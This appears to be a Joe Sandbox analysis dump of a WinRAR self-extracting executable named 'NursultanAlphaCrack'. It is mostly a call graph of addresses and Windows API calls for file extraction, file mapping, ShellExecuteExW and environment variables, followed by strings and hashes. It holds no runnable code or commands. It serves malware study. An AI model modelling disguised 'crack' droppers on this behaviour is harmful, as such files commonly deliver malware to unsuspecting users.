24791 1dac04 SetCurrentDirectoryW 24677->24791 24681 1dc017 SetDlgItemTextW 24678->24681 24680->24686 24681->24667 24682 1dba87 24688 1dba9e 24682->24688 24689 1dba90 GetLastError 24682->24689 24683 1ce617 53 API calls 24683->24611 24690 1dc04d 24684->24690 24717 1dc072 24684->24717 24685 1dc1ba 24687 1dc1e1 24685->24687 24702 1dc1d9 SendMessageW 24685->24702 24686->24685 24897 1c12d3 GetDlgItem EnableWindow 24686->24897 24687->24611 24703 1ce617 53 API calls 24687->24703 24694 1dbb11 24688->24694 24699 1dbb20 24688->24699 24704 1dbaae GetTickCount 24688->24704 24689->24688 24895 1d9ed5 32 API calls 24690->24895 24691 1dc0cb 24693 1dc73f 97 API calls 24691->24693 24693->24713 24698 1dbd56 24694->24698 24694->24699 24696 1dc1b0 24898 1c12d3 GetDlgItem EnableWindow 24696->24898 24705 1dbed0 24697->24705 24800 1c12f1 GetDlgItem ShowWindow 24698->24800 24706 1dbcfb 24699->24706 24708 1dbb39 GetModuleFileNameW 24699->24708 24709 1dbcf1 24699->24709 24700 1dc066 24700->24717 24702->24687 24703->24642 24711 1c4092 _swprintf 51 API calls 24704->24711 24712 1c4092 _swprintf 51 API calls 24705->24712 24716 1ce617 53 API calls 24706->24716 24707 1dc169 24896 1d9ed5 32 API calls 24707->24896 24889 1cf28c 82 API calls 24708->24889 24709->24620 24709->24706 24719 1dbac7 24711->24719 24712->24720 24713->24673 24713->24707 24721 1ce617 53 API calls 24713->24721 24724 1dbd05 24716->24724 24717->24691 24725 1dc73f 97 API calls 24717->24725 24718 1dbd66 24801 1c12f1 GetDlgItem ShowWindow 24718->24801 24792 1c966e 24719->24792 24720->24683 24721->24713 24722 1dc188 24722->24673 24723 1dbb5f 24727 1c4092 _swprintf 51 API calls 24723->24727 24728 1c4092 _swprintf 51 API calls 24724->24728 24729 1dc0a0 24725->24729 24731 1dbb81 CreateFileMappingW 24727->24731 24732 1dbd23 24728->24732 24729->24691 24733 1dc0a9 DialogBoxParamW 24729->24733 24730 1dbd70 24734 1ce617 53 API calls 24730->24734 24736 1dbbe3 GetCommandLineW 24731->24736 24769 1dbc60 __InternalCxxFrameHandler 24731->24769 24746 1ce617 53 API calls 24732->24746 24733->24620 24733->24691 24737 1dbd7a SetDlgItemTextW 24734->24737 24741 1dbbf4 24736->24741 24802 1c12f1 GetDlgItem ShowWindow 24737->24802 24738 1dbaed 24739 1dbaf4 GetLastError 24738->24739 24740 1dbaff 24738->24740 24739->24740 24744 1c959a 80 API calls 24740->24744 24890 1db425 SHGetMalloc 24741->24890 24742 1dbc6b ShellExecuteExW 24764 1dbc88 24742->24764 24744->24694 24749 1dbd3d 24746->24749 24747 1dbd8c SetDlgItemTextW GetDlgItem 24750 1dbda9 GetWindowLongW SetWindowLongW 24747->24750 24751 1dbdc1 24747->24751 24748 1dbc10 24891 1db425 SHGetMalloc 24748->24891 24750->24751 24803 1dc73f 24751->24803 24755 1dbc1c 24892 1db425 SHGetMalloc 24755->24892 24756 1dbccb 24756->24709 24762 1dbce1 UnmapViewOfFile CloseHandle 24756->24762 24757 1dc73f 97 API calls 24759 1dbddd 24757->24759 24828 1dda52 24759->24828 24760 1dbc28 24893 1cf3fa 82 API calls 2 library calls 24760->24893 24762->24709 24764->24756 24767 1dbcb7 Sleep 24764->24767 24766 1dbc3f MapViewOfFile 24766->24769 24767->24756 24767->24764 24768 1dc73f 97 API calls 24772 1dbe03 24768->24772 24769->24742 24770 1dbe2c 24894 1c12d3 GetDlgItem EnableWindow 24770->24894 24772->24770 24774 1dc73f 97 API calls 24772->24774 24773->24620 24773->24643 24774->24770 24776 1c1378 24775->24776 24778 1c131f 24775->24778 24900 1ce2c1 GetWindowLongW SetWindowLongW 24776->24900 24779 1c1385 24778->24779 24899 1ce2e8 61 API calls 2 library calls 24778->24899 24779->24611 24779->24612 24779->24613 24781 1c1341 24781->24779 24782 1c1354 GetDlgItem 24781->24782 24782->24779 24783 1c1364 24782->24783 24783->24779 24784 1c136a SetWindowTextW 24783->24784 24784->24779 24788 1ca0bb 24785->24788 24786 1ca14c 24787 1ca2b2 8 API calls 24786->24787 24790 1ca175 24786->24790 24787->24790 24788->24786 24788->24790 24901 1ca2b2 24788->24901 24790->24676 24790->24677 24791->24682 24793 1c9678 24792->24793 24794 1c96d5 CreateFileW 24793->24794 24795 1c96c9 24793->24795 24794->24795 24796 1c971f 24795->24796 24797 1cbb03 GetCurrentDirectoryW 24795->24797 24796->24738 24798 1c9704 24797->24798 24798->24796 24799 1c9708 CreateFileW 24798->24799 24799->24796 24800->24718 24801->24730 24802->24747 24804 1dc749 __EH_prolog 24803->24804 24805 1dbdcf 24804->24805 24806 1db314 ExpandEnvironmentStringsW 24804->24806 24805->24757 24817 1dc780 _wcslen _wcsrchr 24806->24817 24808 1db314 ExpandEnvironmentStringsW 24808->24817 24809 1dca67 SetWindowTextW 24809->24817 24812 1e3e3e 22 API calls 24812->24817 24814 1dc855 SetFileAttributesW 24816 1dc90f GetFileAttributesW 24814->24816 24827 1dc86f __cftof _wcslen 24814->24827 24816->24817 24819 1dc921 DeleteFileW 24816->24819 24817->24805 24817->24808 24817->24809 24817->24812 24817->24814 24821 1dcc31 GetDlgItem SetWindowTextW SendMessageW 24817->24821 24823 1dcc71 SendMessageW 24817->24823 24922 1d1fbb CompareStringW 24817->24922 24923 1da64d GetCurrentDirectoryW 24817->24923 24925 1ca5d1 6 API calls 24817->24925 24926 1ca55a FindClose 24817->24926 24927 1db48e 76 API calls 2 library calls 24817->24927 24819->24817 24820 1dc932 24819->24820 24822 1c4092 _swprintf 51 API calls 24820->24822 24821->24817 24824 1dc952 GetFileAttributesW 24822->24824 24823->24817 24824->24820 24825 1dc967 MoveFileW 24824->24825 24825->24817 24826 1dc97f MoveFileExW 24825->24826 24826->24817 24827->24816 24827->24817 24924 1cb991 51 API calls 2 library calls 24827->24924 24829 1dda5c __EH_prolog 24828->24829 24928 1d0659 24829->24928 24831 1dda8d 24932 1c5b3d 24831->24932 24833 1ddaab 24936 1c7b0d 24833->24936 24837 1ddafe 24952 1c7b9e 24837->24952 24839 1dbdee 24839->24768 24841 1dd6a8 24840->24841 24842 1da5c6 4 API calls 24841->24842 24843 1dd6ad 24842->24843 24844 1dd6b5 GetWindow 24843->24844 24845 1dbf15 24843->24845 24844->24845 24846 1dd6d5 24844->24846 24845->24621 24845->24622 24846->24845 24847 1dd6e2 GetClassNameW 24846->24847 24849 1dd76a GetWindow 24846->24849 24850 1dd706 GetWindowLongW 24846->24850 25403 1d1fbb CompareStringW 24847->25403 24849->24845 24849->24846 24850->24849 24851 1dd716 SendMessageW 24850->24851 24851->24849 24852 1dd72c GetObjectW 24851->24852 25404 1da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24852->25404 24854 1dd743 25405 1da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24854->25405 25406 1da80c 8 API calls 24854->25406 24857 1dd754 SendMessageW DeleteObject 24857->24849 24858->24632 24860 1dabcc 24859->24860 24861 1dabf1 24859->24861 25407 1d1fbb CompareStringW 24860->25407 24865 1db093 24861->24865 24863 1dabdf 24863->24861 24864 1dabe3 FindWindowExW 24863->24864 24864->24861 24866 1db09d __EH_prolog 24865->24866 24867 1c13dc 84 API calls 24866->24867 24868 1db0bf 24867->24868 25408 1c1fdc 24868->25408 24871 1db0d9 24873 1c1692 86 API calls 24871->24873 24872 1db0eb 24874 1c19af 128 API calls 24872->24874 24875 1db0e4 24873->24875 24877 1db10d __InternalCxxFrameHandler ___std_exception_copy 24874->24877 24875->24662 24875->24665 24876 1c1692 86 API calls 24876->24875 24877->24876 24878->24642 24880 1db568 5 API calls 24879->24880 24881 1dd4e0 GetDlgItem 24880->24881 24882 1dd536 SendMessageW SendMessageW 24881->24882 24883 1dd502 24881->24883 24884 1dd591 SendMessageW SendMessageW SendMessageW 24882->24884 24885 1dd572 24882->24885 24888 1dd50d ShowWindow SendMessageW SendMessageW 24883->24888 24886 1dd5c4 SendMessageW 24884->24886 24887 1dd5e7 SendMessageW 24884->24887 24885->24884 24886->24887 24887->24666 24888->24882 24889->24723 24890->24748 24891->24755 24892->24760 24893->24766 24894->24773 24895->24700 24896->24722 24897->24696 24898->24685 24899->24781 24900->24779 24902 1ca2bf 24901->24902 24903 1ca2e3 24902->24903 24904 1ca2d6 CreateDirectoryW 24902->24904 24905 1ca231 3 API calls 24903->24905 24904->24903 24907 1ca316 24904->24907 24906 1ca2e9 24905->24906 24908 1ca329 GetLastError 24906->24908 24910 1cbb03 GetCurrentDirectoryW 24906->24910 24909 1ca325 24907->24909 24914 1ca4ed 24907->24914 24908->24909 24909->24788 24912 1ca2ff 24910->24912 24912->24908 24913 1ca303 CreateDirectoryW 24912->24913 24913->24907 24913->24908 24915 1dec50 24914->24915 24916 1ca4fa SetFileAttributesW 24915->24916 24917 1ca53d 24916->24917 24918 1ca510 24916->24918 24917->24909 24919 1cbb03 GetCurrentDirectoryW 24918->24919 24920 1ca524 24919->24920 24920->24917 24921 1ca528 SetFileAttributesW 24920->24921 24921->24917 24922->24817 24923->24817 24924->24827 24925->24817 24926->24817 24927->24817 24929 1d0666 _wcslen 24928->24929 24956 1c17e9 24929->24956 24931 1d067e 24931->24831 24933 1d0659 _wcslen 24932->24933 24934 1c17e9 78 API calls 24933->24934 24935 1d067e 24934->24935 24935->24833 24937 1c7b17 __EH_prolog 24936->24937 24973 1cce40 24937->24973 24939 1c7b32 24940 1deb38 8 API calls 24939->24940 24941 1c7b5c 24940->24941 24979 1d4a76 24941->24979 24944 1c7c7d 24945 1c7c87 24944->24945 24947 1c7cf1 24945->24947 25008 1ca56d 24945->25008 24949 1c7d50 24947->24949 24986 1c8284 24947->24986 24948 1c7d92 24948->24837 24949->24948 25014 1c138b 74 API calls 24949->25014 24953 1c7bac 24952->24953 24955 1c7bb3 24952->24955 24954 1d2297 86 API calls 24953->24954 24954->24955 24957 1c17ff 24956->24957 24968 1c185a __InternalCxxFrameHandler 24956->24968 24958 1c1828 24957->24958 24969 1c6c36 76 API calls __vswprintf_c_l 24957->24969 24959 1c1887 24958->24959 24965 1c1847 ___std_exception_copy 24958->24965 24961 1e3e3e 22 API calls 24959->24961 24964 1c188e 24961->24964 24962 1c181e 24970 1c6ca7 75 API calls 24962->24970 24964->24968 24972 1c6ca7 75 API calls 24964->24972 24965->24968 24971 1c6ca7 75 API calls 24965->24971 24968->24931 24969->24962 24970->24958 24971->24968 24972->24968 24974 1cce4a __EH_prolog 24973->24974 24975 1deb38 8 API calls 24974->24975 24976 1cce8d 24975->24976 24977 1deb38 8 API calls 24976->24977 24978 1cceb1 24977->24978 24978->24939 24980 1d4a80 __EH_prolog 24979->24980 24981 1deb38 8 API calls 24980->24981 24982 1d4a9c 24981->24982 24983 1c7b8b 24982->24983 24985 1d0e46 80 API calls 24982->24985 24983->24944 24985->24983 24987 1c828e __EH_prolog 24986->24987 25015 1c13dc 24987->25015 24989 1c82aa 24990 1c82bb 24989->24990 25155 1c9f42 24989->25155 24993 1c82f2 24990->24993 25023 1c1a04 24990->25023 25151 1c1692 24993->25151 24996 1c8389 25042 1c8430 24996->25042 25000 1c83e8 25047 1c1f6d 25000->25047 25003 1c82ee 25003->24993 25003->24996 25006 1ca56d 7 API calls 25003->25006 25159 1cc0c5 CompareStringW _wcslen 25003->25159 25004 1c83f3 25004->24993 25051 1c3b2d 25004->25051 25063 1c848e 25004->25063 25006->25003 25009 1ca582 25008->25009 25013 1ca5b0 25009->25013 25392 1ca69b 25009->25392 25011 1ca592 25012 1ca597 FindClose 25011->25012 25011->25013 25012->25013 25013->24945 25014->24948 25016 1c13e1 __EH_prolog 25015->25016 25017 1cce40 8 API calls 25016->25017 25018 1c1419 25017->25018 25019 1deb38 8 API calls 25018->25019 25022 1c1474 __cftof 25018->25022 25020 1c1461 25019->25020 25021 1cb505 84 API calls 25020->25021 25020->25022 25021->25022 25022->24989 25024 1c1a0e __EH_prolog 25023->25024 25036 1c1a61 25024->25036 25039 1c1b9b 25024->25039 25161 1c13ba 25024->25161 25026 1c1bc7 25164 1c138b 74 API calls 25026->25164 25029 1c3b2d 101 API calls 25033 1c1c12 25029->25033 25030 1c1bd4 25030->25029 25030->25039 25031 1c1c5a 25035 1c1c8d 25031->25035 25031->25039 25165 1c138b 74 API calls 25031->25165 25033->25031 25034 1c3b2d 101 API calls 25033->25034 25034->25033 25035->25039 25040 1c9e80 79 API calls 25035->25040 25036->25026 25036->25030 25036->25039 25037 1c3b2d 101 API calls 25038 1c1cde 25037->25038 25038->25037 25038->25039 25039->25003 25040->25038 25041 1c9e80 79 API calls 25041->25036 25183 1ccf3d 25042->25183 25044 1c8440 25187 1d13d2 GetSystemTime SystemTimeToFileTime 25044->25187 25046 1c83a3 25046->25000 25160 1d1b66 72 API calls 25046->25160 25048 1c1f72 __EH_prolog 25047->25048 25050 1c1fa6 25048->25050 25188 1c19af 25048->25188 25050->25004 25052 1c3b3d 25051->25052 25053 1c3b39 25051->25053 25062 1c9e80 79 API calls 25052->25062 25053->25004 25054 1c3b4f 25055 1c3b78 25054->25055 25056 1c3b6a 25054->25056 25319 1c286b 101 API calls 3 library calls 25055->25319 25058 1c3baa 25056->25058 25318 1c32f7 89 API calls 2 library calls 25056->25318 25058->25004 25060 1c3b76 25060->25058 25320 1c20d7 74 API calls 25060->25320 25062->25054 25064 1c8498 __EH_prolog 25063->25064 25069 1c84d5 25064->25069 25074 1c8513 25064->25074 25345 1d8c8d 103 API calls 25064->25345 25065 1c84f5 25067 1c851c 25065->25067 25068 1c84fa 25065->25068 25067->25074 25347 1d8c8d 103 API calls 25067->25347 25068->25074 25346 1c7a0d 152 API calls 25068->25346 25069->25065 25070 1c857a 25069->25070 25069->25074 25070->25074 25321 1c5d1a 25070->25321 25074->25004 25075 1c8605 25075->25074 25327 1c8167 25075->25327 25078 1c8797 25079 1ca56d 7 API calls 25078->25079 25080 1c8802 25078->25080 25079->25080 25333 1c7c0d 25080->25333 25082 1cd051 82 API calls 25088 1c885d 25082->25088 25083 1c898b 25350 1c2021 74 API calls 25083->25350 25084 1c8992 25085 1c8a5f 25084->25085 25093 1c89e1 25084->25093 25089 1c8ab6 25085->25089 25104 1c8a6a 25085->25104 25088->25074 25088->25082 25088->25083 25088->25084 25348 1c8117 84 API calls 25088->25348 25349 1c2021 74 API calls 25088->25349 25096 1c8a4c 25089->25096 25353 1c7fc0 97 API calls 25089->25353 25090 1c9105 25095 1c959a 80 API calls 25090->25095 25091 1c8b14 25091->25090 25111 1c8b82 25091->25111 25354 1c98bc 25091->25354 25092 1c8ab4 25097 1c959a 80 API calls 25092->25097 25093->25091 25093->25096 25098 1ca231 3 API calls 25093->25098 25095->25074 25096->25091 25096->25092 25097->25074 25099 1c8a19 25098->25099 25099->25096 25351 1c92a3 97 API calls 25099->25351 25100 1cab1a 8 API calls 25102 1c8bd1 25100->25102 25106 1cab1a 8 API calls 25102->25106 25104->25092 25352 1c7db2 101 API calls 25104->25352 25122 1c8be7 25106->25122 25109 1c8b70 25358 1c6e98 77 API calls 25109->25358 25111->25100 25112 1c8d18 25115 1c8d8a 25112->25115 25116 1c8d28 25112->25116 25113 1c8e40 25117 1c8e66 25113->25117 25118 1c8e52 25113->25118 25137 1c8d49 25113->25137 25114 1c8cbc 25114->25112 25114->25113 25124 1c8167 19 API calls 25115->25124 25119 1c8d6e 25116->25119 25129 1c8d37 25116->25129 25121 1d3377 75 API calls 25117->25121 25120 1c9215 123 API calls 25118->25120 25119->25137 25361 1c77b8 111 API calls 25119->25361 25120->25137 25125 1c8e7f 25121->25125 25122->25114 25123 1c8c93 25122->25123 25131 1c981a 79 API calls 25122->25131 25123->25114 25359 1c9a3c 82 API calls 25123->25359 25128 1c8dbd 25124->25128 25364 1d3020 123 API calls 25125->25364 25133 1c8df5 25128->25133 25134 1c8de6 25128->25134 25128->25137 25360 1c2021 74 API calls 25129->25360 25131->25123 25363 1c9155 93 API calls __EH_prolog 25133->25363 25362 1c7542 85 API calls 25134->25362 25142 1c8f85 25137->25142 25365 1c2021 74 API calls 25137->25365 25139 1c9090 25139->25090 25140 1ca4ed 3 API calls 25139->25140 25143 1c90eb 25140->25143 25141 1c903e 25340 1c9da2 25141->25340 25142->25090 25142->25139 25142->25141 25339 1c9f09 SetEndOfFile 25142->25339 25143->25090 25366 1c2021 74 API calls 25143->25366 25146 1c9085 25148 1c9620 77 API calls 25146->25148 25148->25139 25149 1c90fb 25367 1c6dcb 76 API calls 25149->25367 25152 1c16a4 25151->25152 25383 1ccee1 25152->25383 25156 1c9f59 25155->25156 25157 1c9f63 25156->25157 25391 1c6d0c 78 API calls 25156->25391 25157->24990 25159->25003 25160->25000 25166 1c1732 25161->25166 25163 1c13d6 25163->25041 25164->25039 25165->25035 25167 1c1748 25166->25167 25178 1c17a0 __InternalCxxFrameHandler 25166->25178 25168 1c1771 25167->25168 25179 1c6c36 76 API calls __vswprintf_c_l 25167->25179 25170 1c17c7 25168->25170 25173 1c178d ___std_exception_copy 25168->25173 25172 1e3e3e 22 API calls 25170->25172 25171 1c1767 25180 1c6ca7 75 API calls 25171->25180 25175 1c17ce 25172->25175 25173->25178 25181 1c6ca7 75 API calls 25173->25181 25175->25178 25182 1c6ca7 75 API calls 25175->25182 25178->25163 25179->25171 25180->25168 25181->25178 25182->25178 25184 1ccf4d 25183->25184 25186 1ccf54 25183->25186 25185 1c981a 79 API calls 25184->25185 25185->25186 25186->25044 25187->25046 25189 1c19bf 25188->25189 25190 1c19bb 25188->25190 25192 1c18f6 25189->25192 25190->25050 25193 1c1908 25192->25193 25194 1c1945 25192->25194 25195 1c3b2d 101 API calls 25193->25195 25200 1c3fa3 25194->25200 25198 1c1928 25195->25198 25198->25190 25201 1c3fac 25200->25201 25202 1c3b2d 101 API calls 25201->25202 25204 1c1966 25201->25204 25217 1d0e08 25201->25217 25202->25201 25204->25198 25205 1c1e50 25204->25205 25206 1c1e5a __EH_prolog 25205->25206 25225 1c3bba 25206->25225 25208 1c1e84 25209 1c1732 78 API calls 25208->25209 25211 1c1f0b 25208->25211 25210 1c1e9b 25209->25210 25253 1c18a9 78 API calls 25210->25253 25211->25198 25213 1c1eb3 25214 1c1ebf _wcslen 25213->25214 25254 1d1b84 MultiByteToWideChar 25213->25254 25255 1c18a9 78 API calls 25214->25255 25218 1d0e0f 25217->25218 25221 1d0e2a 25218->25221 25223 1c6c31 RaiseException CallUnexpected 25218->25223 25220 1d0e3b SetThreadExecutionState 25220->25201 25221->25220 25224 1c6c31 RaiseException CallUnexpected 25221->25224 25223->25221 25224->25220 25226 1c3bc4 __EH_prolog 25225->25226 25227 1c3bda 25226->25227 25228 1c3bf6 25226->25228 25281 1c138b 74 API calls 25227->25281 25229 1c3e51 25228->25229 25233 1c3c22 25228->25233 25298 1c138b 74 API calls 25229->25298 25232 1c3be5 25232->25208 25233->25232 25256 1d3377 25233->25256 25235 1c3ca3 25236 1c3d2e 25235->25236 25252 1c3c9a 25235->25252 25284 1cd051 25235->25284 25266 1cab1a 25236->25266 25237 1c3c9f 25237->25235 25283 1c20bd 78 API calls 25237->25283 25239 1c3c8f 25282 1c138b 74 API calls 25239->25282 25240 1c3c71 25240->25235 25240->25237 25240->25239 25244 1c3d41 25246 1c3dd7 25244->25246 25247 1c3dc7 25244->25247 25290 1d3020 123 API calls 25246->25290 25270 1c9215 25247->25270 25250 1c3dd5 25250->25252 25291 1c2021 74 API calls 25250->25291 25292 1d2297 25252->25292 25253->25213 25254->25214 25255->25211 25257 1d338c 25256->25257 25259 1d3396 ___std_exception_copy 25256->25259 25299 1c6ca7 75 API calls 25257->25299 25260 1d34c6 25259->25260 25261 1d341c 25259->25261 25265 1d3440 __cftof 25259->25265 25301 1e238d RaiseException 25260->25301 25300 1d32aa 75 API calls 3 library calls 25261->25300 25264 1d34f2 25265->25240 25267 1cab28 25266->25267 25268 1cab32 25266->25268 25269 1deb38 8 API calls 25267->25269 25268->25244 25269->25268 25271 1c921f __EH_prolog 25270->25271 25302 1c7c64 25271->25302 25274 1c13ba 78 API calls 25275 1c9231 25274->25275 25305 1cd114 25275->25305 25277 1c928a 25277->25250 25279 1cd114 118 API calls 25280 1c9243 25279->25280 25280->25277 25280->25279 25314 1cd300 97 API calls __InternalCxxFrameHandler 25280->25314 25281->25232 25282->25252 25283->25235 25285 1cd084 25284->25285 25286 1cd072 25284->25286 25316 1c603a 82 API calls 25285->25316 25315 1c603a 82 API calls 25286->25315 25289 1cd07c 25289->25236 25290->25250 25291->25252 25293 1d22a1 25292->25293 25294 1d22ba 25293->25294 25297 1d22ce 25293->25297 25317 1d0eed 86 API calls 25294->25317 25296 1d22c1 25296->25297 25298->25232 25299->25259 25300->25265 25301->25264 25303 1cb146 GetVersionExW 25302->25303 25304 1c7c69 25303->25304 25304->25274 25311 1cd12a __InternalCxxFrameHandler 25305->25311 25306 1cd29a 25307 1cd2ce 25306->25307 25308 1cd0cb 6 API calls 25306->25308 25309 1d0e08 SetThreadExecutionState RaiseException 25307->25309 25308->25307 25312 1cd291 25309->25312 25310 1d8c8d 103 API calls 25310->25311 25311->25306 25311->25310 25311->25312 25313 1cac05 91 API calls 25311->25313 25312->25280 25313->25311 25314->25280 25315->25289 25316->25289 25317->25296 25318->25060 25319->25060 25320->25058 25322 1c5d2a 25321->25322 25368 1c5c4b 25322->25368 25324 1c5d5d 25326 1c5d95 25324->25326 25373 1cb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25324->25373 25326->25075 25328 1c8186 25327->25328 25329 1c8232 25328->25329 25380 1cbe5e 19 API calls __InternalCxxFrameHandler 25328->25380 25379 1d1fac CharUpperW 25329->25379 25332 1c823b 25332->25078 25335 1c7c22 25333->25335 25334 1c7c5a 25334->25088 25335->25334 25381 1c6e7a 74 API calls 25335->25381 25337 1c7c52 25382 1c138b 74 API calls 25337->25382 25339->25141 25341 1c9db3 25340->25341 25344 1c9dc2 25340->25344 25342 1c9db9 FlushFileBuffers 25341->25342 25341->25344 25342->25344 25343 1c9e3f SetFileTime 25343->25146 25344->25343 25345->25069 25346->25074 25347->25074 25348->25088 25349->25088 25350->25084 25351->25096 25352->25092 25353->25096 25355 1c98c5 GetFileType 25354->25355 25356 1c8b5a 25354->25356 25355->25356 25356->25111 25357 1c2021 74 API calls 25356->25357 25357->25109 25358->25111 25359->25114 25360->25137 25361->25137 25362->25137 25363->25137 25364->25137 25365->25142 25366->25149 25367->25090 25374 1c5b48 25368->25374 25370 1c5c6c 25370->25324 25372 1c5b48 2 API calls 25372->25370 25373->25324 25375 1c5b52 25374->25375 25377 1c5c3a 25375->25377 25378 1cb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25375->25378 25377->25370 25377->25372 25378->25375 25379->25332 25380->25329 25381->25337 25382->25334 25384 1ccef2 25383->25384 25389 1ca99e 86 API calls 25384->25389 25386 1ccf24 25390 1ca99e 86 API calls 25386->25390 25388 1ccf2f 25389->25386 25390->25388 25391->25157 25393 1ca6a8 25392->25393 25394 1ca727 FindNextFileW 25393->25394 25395 1ca6c1 FindFirstFileW 25393->25395 25397 1ca732 GetLastError 25394->25397 25402 1ca709 25394->25402 25396 1ca6d0 25395->25396 25395->25402 25398 1cbb03 GetCurrentDirectoryW 25396->25398 25397->25402 25399 1ca6e0 25398->25399 25400 1ca6fe GetLastError 25399->25400 25401 1ca6e4 FindFirstFileW 25399->25401 25400->25402 25401->25400 25401->25402 25402->25011 25403->24846 25404->24854 25405->24854 25406->24857 25407->24863 25409 1c9f42 78 API calls 25408->25409 25410 1c1fe8 25409->25410 25411 1c1a04 101 API calls 25410->25411 25414 1c2005 25410->25414 25412 1c1ff5 25411->25412 25412->25414 25415 1c138b 74 API calls 25412->25415 25414->24871 25414->24872 25415->25414 25416 1c13e1 84 API calls 2 library calls 25463 1d94e0 GetClientRect 25464 1df2e0 46 API calls __RTC_Initialize 25512 1d21e0 26 API calls std::bad_exception::bad_exception 25465 1ebee0 GetCommandLineA GetCommandLineW

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 001D0863: GetModuleHandleW.KERNEL32(kernel32), ref: 001D087C
                                                                                          • Part of subcall function 001D0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001D088E
                                                                                          • Part of subcall function 001D0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001D08BF
                                                                                          • Part of subcall function 001DA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001DA655
                                                                                          • Part of subcall function 001DAC16: OleInitialize.OLE32(00000000), ref: 001DAC2F
                                                                                          • Part of subcall function 001DAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001DAC66
                                                                                          • Part of subcall function 001DAC16: SHGetMalloc.SHELL32(00208438), ref: 001DAC70
                                                                                        • GetCommandLineW.KERNEL32 ref: 001DDF5C
                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001DDF83
                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001DDF94
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 001DDFCE
                                                                                          • Part of subcall function 001DDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001DDBF4
                                                                                          • Part of subcall function 001DDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001DDC30
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 001DDFD7
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,0021EC90,00000800), ref: 001DDFF2
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,0021EC90), ref: 001DDFFE
                                                                                        • GetLocalTime.KERNEL32(?), ref: 001DE009
                                                                                        • _swprintf.LIBCMT ref: 001DE048
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001DE05A
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 001DE061
                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 001DE078
                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 001DE0C9
                                                                                        • Sleep.KERNEL32(?), ref: 001DE0F7
                                                                                        • DeleteObject.GDI32 ref: 001DE130
                                                                                        • DeleteObject.GDI32(?), ref: 001DE140
                                                                                        • CloseHandle.KERNEL32 ref: 001DE183
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz!
                                                                                        • API String ID: 3049964643-979415311
                                                                                        • Opcode ID: 9dcbe1fb3998852f23304e35546b8e3c857d53661a3c4a04891e7abaf5117a29
                                                                                        • Instruction ID: 132cabcc950dcf567da81f4d40dfbd1d1aa93fcbbe8201e03668f29f6cbb054c
                                                                                        • Opcode Fuzzy Hash: 9dcbe1fb3998852f23304e35546b8e3c857d53661a3c4a04891e7abaf5117a29
                                                                                        • Instruction Fuzzy Hash: 9E61E371608304AFD720ABA4FC4DF7B77ECAB65704F00042BF94592292DF789A84C7A1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 812 1da6c2-1da6df FindResourceW 813 1da7db 812->813 814 1da6e5-1da6f6 SizeofResource 812->814 815 1da7dd-1da7e1 813->815 814->813 816 1da6fc-1da70b LoadResource 814->816 816->813 817 1da711-1da71c LockResource 816->817 817->813 818 1da722-1da737 GlobalAlloc 817->818 819 1da73d-1da746 GlobalLock 818->819 820 1da7d3-1da7d9 818->820 821 1da7cc-1da7cd GlobalFree 819->821 822 1da74c-1da76a call 1e0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 1da76c-1da78e call 1da626 822->825 826 1da7c5-1da7c6 GlobalUnlock 822->826 825->826 831 1da790-1da798 825->831 826->821 832 1da79a-1da7ae GdipCreateHBITMAPFromBitmap 831->832 833 1da7b3-1da7c1 831->833 832->833 834 1da7b0 832->834 833->826 834->833
                                                                                        APIs
                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001DB73D,00000066), ref: 001DA6D5
                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA6EC
                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,001DB73D,00000066), ref: 001DA703
